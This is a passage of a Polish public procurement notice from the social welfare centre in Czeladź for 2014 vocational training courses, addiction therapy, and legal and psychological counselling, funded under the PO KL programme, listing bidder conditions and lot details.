Przykładowy zakres tematyczny:
Zakres tematyczny Indywidualnego poradnictwa prawnego powinien obejmować co najmniej :
Zakres i tematyka porad prawnych związana będzie z indywidualnymi potrzebami klientów i obejmuje poradnictwo oraz sporządzanie pozwów, pism, wniosków i skarg m.in. z zakresu: 
Prawa cywilnego: poradnictwo z zakresu prawa zobowiązań, postępowania nieprocesowego, postępowań nakazowych i upominawczych.
Prawa rodzinnego: poradnictwo oraz sporządzanie pozwów i pism procesowych w sprawach rozwodowych i separacyjnych, poradnictwo w zakresie rozdzielności majątkowej 
Prawa ubezpieczeń: poradnictwo z zakresu spraw emerytalno - rentowych, sporządzanie odwołań i pism procesowych w sprawach związanych z odwołaniami od decyzji ZUS. 
Poradnictwa z zakresu prawa pracy. 
Prawa lokalowego,. i ochrony praw lokatorów: sprawy dotyczące uzyskania lub odzyskania tytułu prawnego do lokalu poradnictwo z zakresu spraw dotyczących praw i obowiązków właścicieli, najemców, podnajemców itp. 

Zakres tematyczny Indywidualnego poradnictwa psychologicznego i rodzinnego powinien obejmować co najmniej:
Zakres i tematyka doradztwa związana będzie z indywidualnymi potrzebami klientów. Doradztwo powinno zmierzać do zdiagnozowania potrzeb uczestnika konsultacji, poradnictwo świadczone na rzecz osób i rodzin mających trudności lub wykazujących potrzebę wsparcia w rozwiązywaniu problemów życiowych, w tym problemów interpersonalnych, wychowawczych, psychospołecznych, problemów dot. przemocy w rodzinie, czy opieki nad osobą niepełnosprawną..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 79.14.00.00-7, 85.31.23.20-8, 85.12.12.70-6, 80.57.00.00-0, 55.00.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku  
Metodą spełnia - nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu art. 22 ust. 1 ustawy z dnia 29.01.2004r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku  
 Metodą spełnia - nie spełnia na podstawie:
- oświadczenia o spełnianiu warunków udziału w postępowaniu określonych  w art.22 ust.1 ustawy Pzp
-  Wykazu głównych usług, niezbędnych do wykazania spełniania warunku posiadania wiedzy i doświadczenia wykonanych lub wykonywanych usług w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z dowodami, iż te usługi zostały wykonane należycie.
Wykaz winien zawierać co najmniej 1 usługę szkoleniową z zakresu tematycznego porównywalnego ze składaną ofertą, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz przedstawi dowód, że usługa została wykonana należycie, o wartości brutto nie mniejszej niż:
dla Części I      -     5.984,00 zł
dla Części II     -    16.260,00 zł
dla Części III    -    11.778,00 zł
dla Części IV    -    52.224,00 zł
dla Części V     -    15.900,00 zł
dla Części VI    -      6.005,00 zł
dla Części VII   -      8.784,00 zł
dla Części VIII  -      9.600,00 zł
dla Części IX    -    15.261,00 zł
dla Części X     -      4.320,00zł
dla Części XI    -   12.236,00 zł
dla Części XII   -     8.159,00 zł
dla Części XIII  -     5.332,00 zł</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku  
Metodą spełnia - nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonych  w art.22 ust.1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia na podstawie:
- oświadczenia o spełnianiu warunków udziału w postępowaniu określonych  w art.22 ust.1 ustawy Pzp
- wykazu osób, które które będą uczestniczyć w wykonywaniu zamówienia oraz oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, a także zakresu wykonywanych przez nie czynności , oraz informacją o podstawie do dysponowania tymi osobami. 

Dla części X zamówienia wymagane jest aby osoba prowadząca terapię psychologiczną dla osób uzależnionych od alkoholu spełniała następujące warunki: 
- posiadała wyższe wykształcenie,
- posiadała tytuł specjalisty psychoterapii uzależnień lub będąca w trakcie specjalizacji,
- posiadała wiedzę i doświadczenie poparte praktyczną terapią uzależnień  udokumentowaną   min. 2 letnim doświadczeniem w realizacji indywidualnych lub grupowych zajęć w zakresie profilaktyki i terapii uzależnień dla osób uzależnionych bądź współuzależnionych na podstawie oświadczenia złożonego przez składającego ofertę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia-nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonych  w art.22 ust.1 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykaz wyżej wymienionych usług winien zawierać co najmniej jedną usługę szkoleniową z zakresu tematycznego porównywalnego ze składaną ofertą, o wartości brutto nie mniejszej niż: 
dla Części I - 5.984,00 zł
dla Części II - 16.260,00 zł
dla Części III - 11.778,00 zł
dla Części IV - 52.224,00 zł
dla Części V - 15.900,00 zł
dla Części VI - 6.005,00 zł
dla Części VII - 8.784,00 zł
dla Części VIII - 9.600,00 zł
dla Części IX - 15.261,00 zł
dla Części X - 4.320,00zł
dla Części XI - 12.236,00 zł
dla Części XII - 8.159,00 zł
dla Części XIII - 5.332,00 zł;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony formularz oferty z kompletem załączników.
2) Pisemne zobowiązania podmiotów oddających Wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania  zamówienia lub zdolnościach finansowych innych podmiotów. 
3) Pełnomocnictwo, określające jego zakres w przypadku gdy Wykonawcę reprezentuje pełnomocnik.
4) Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego abo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego wykonawców występujących wspólnie w przypadku wspólnego ubiegania się o udzielenie zmówienia.
Przed podpisaniem umowy Wykonawca powinien przedstawić dokumenty:
1. Zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez właściwy Wojewódzki Urząd Pracy oraz informacje o kontynuowaniu działalności szkoleniowej                                 w okresie trwania szkolenia.
2.  Harmonogram szkolenia 
3. W przypadku wybrania oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia,
Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej 
współpracę tych wykonawców (art. 23 ust. 4 Ustawy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian: Zamawiający dopuszcza możliwość zmiany istotnych postanowień zawartej umowy zgodnie z art. 144 ustawy Pzp w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w szczególności w przypadku:
a. zmiany terminu realizacji przedmiotu zamówienia - na podstawie obiektywnych przesłanek zaakceptowanych przez strony.
b. zmiany ilości osób (uczestników szkolenia) na podstawie obiektywnych przesłanek nie dających się przewidzieć np. niestawienia się kandydata na szkolenie pomimo wydania skierowania na szkolenie, przerwania uczestnictwa w szkoleniu (np. podjęcie zatrudnienia lub innej pracy zarobkowej, choroba, nieusprawiedliwiona rezygnacja ze szkolenia), którego nie można było przewidzieć w dniu zawarcia umowy.
c. wystąpienie następujących okoliczności ze strony Wykonawcy:
d. zmiana kadry realizującej szkolenie w wyniku nieprzewidywalnych zdarzeń losowych (np. choroba, śmierć, rozwiązanie stosunku pracy umowy cywilnoprawnej), których nie można było przewidzieć w dniu zawarcia umowy pod warunkiem, że nowo wskazany wykładowca będzie spełniał wymagania wskazane w SIWZ.
e. zmiana miejsca wykonywania zamówienia pod warunkiem, że nowe miejsce wykonania zamówienia zlokalizowane będzie zgodnie z warunkami wskazanymi w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.czeladz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej 41-250 Czeladź ul. 17 Lipca 27, pokój nr 4, tel.: 32/265 14 42, fax.: 32 265 68 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2014 godzina 09:00, miejsce: siedziba Zamawiającego w Czeladzi przy ul. 17Lipca 27, Sekretariat - pok. nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Bez ograniczeń. Program zwiększenia kompetencji zawodowych i społecznych oraz aktywizacja na rynku pracy osób korzystających z pomocy Miejskiego Ośrodka Pomocy Społecznej w Czeladzi  w ramach  PO KL 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs kosmetyczny i wizażu, manicure, pedicure, stylizacji paznokci + dodatkowy moduł profesjonalnej obsługi klienta z obsługą kasy fiskalnej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cel szkolenia: Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 5 osób
Termin realizacji zamówienia: od dnia podpisania umowy do 31.12.2014r.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 300 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna = 45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się po max 7 godz. lekcyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs kucharz, barman, kelner + dodatkowy moduł profesjonalnej obsługi klienta z obsługą kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cel szkolenia: Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 11 osób
Termin realizacji zamówienia: od dnia podpisania umowy do 31.12.2014r.

Należy przedstawić program wszystkich zajęć obejmujący minimum 300 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna = 45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się po max 7 godz. lekcyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Profesjonalna obsługa firmy - kurs księgowości, kadry, płace, ZUS + Moduł asystencko - sekretarski + sztuka negocjacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cel szkolenia: Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 6 osób
Termin realizacji zamówienia: od dnia podpisania umowy do 31.12.2014r.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 300 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna = 45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się po max 7 godz. lekcyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Operator koparko - ładowarki wszystkie typy kl. III + Operator ładowarki jednonaczyniowej kl. III + Operator wózka widłowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cel szkolenia: Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 17 osób
Termin realizacji zamówienia: od dnia podpisania umowy do 31.12.2014r.
Liczba godzin i program szkolenia
Szkolenie winno zostać zorganizowane zgodnie z rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. z 2001 r., Nr 118 poz. 1263)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs monter instalacji wod-kan-gaz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cel szkolenia: Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 10 osób
Termin realizacji zamówienia: od dnia podpisania umowy do 31.12.2014r.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 200 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna = 45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do soboty po max 7 godz. lekcyjnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs ochrony osób i mienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cel szkolenia: Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 5 osób
Termin realizacji zamówienia: od dnia podpisania umowy do 31.12.2014r
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 250 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna = 45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się po max 7 godz. lekcyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs murarz - tynkarz - regipsiarz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cel szkolenia:  Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 3 osoby
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2014r.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 160 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do soboty po max 7 godz. lekcyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kurs fryzjerski + dodatkowy moduł profesjonalnej obsługi klienta z obsługą kasy fiskalnej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cel szkolenia:  Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób:  5 osób
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2014r.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 300 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do piątku po max 7 godz. lekcyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Kurs prawa jazdy KAT.B + badanie lekarskie + egzamin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cel szkolenia: Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 23 osoby 
Termin realizacji zamówienia: od dnia podpisania umowy do 31.12.2014r.
Liczba godzin szkolenia
60 godzin na osobę w tym: 30 godz. teoretycznych w grupie (1 godzina = 45 minut) i 30 godz. praktycznych indywidualnie dla każdej osoby (1 godzina = 60 minut).
Zgodnie z rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 roku (Dz. u. z dnia 14 września 2012 roku, poz. 1019)
Zajęcia teoretyczne mogą odbywać się od poniedziałku do piątku w przedziale godzinowym od 16.00 do 20.00 oraz w soboty od 9.00-18.00..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Przeprowadzenie terapii psychologicznej dla osób uzależnionych od alkoholu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba osób:  7 osób
Czas trwania : od dnia podpisania umowy do 31.12.2014r
Liczba godzin terapii
Przedmiotem zamówienia jest przeprowadzenie 72 godzin terapii psychologicznej dla grupy 7 osobowej 
(1 godzina = 60 minut)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie A
Nazwa  szkolenia:  Trening umiejętności społecznych + indywidualne i grupowe doradztwo zawodowe
Zadanie B
Nazwa szkolenia: Trening umiejętności społecznych + indywidualne i grupowe doradztwo zawodowe
(Dla osób w wieku 15 - 30 oraz powyżej 50 roku życia ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie A
Nazwa  szkolenia:  Trening umiejętności społecznych + indywidualne i grupowe doradztwo zawodowe
W szkoleniu powyższym będzie uczestniczyć 23 osoby podzielone na 2 grupy (12 i 11 osób) w celu zapewnienia uczestnikom dogodnych warunków w trakcie szkolenia. 
Liczba osób: 23 osoby.
Czas trwania szkolenia: od dnia podpisania umowy do 31.12.2014r
Liczba godzin szkolenia
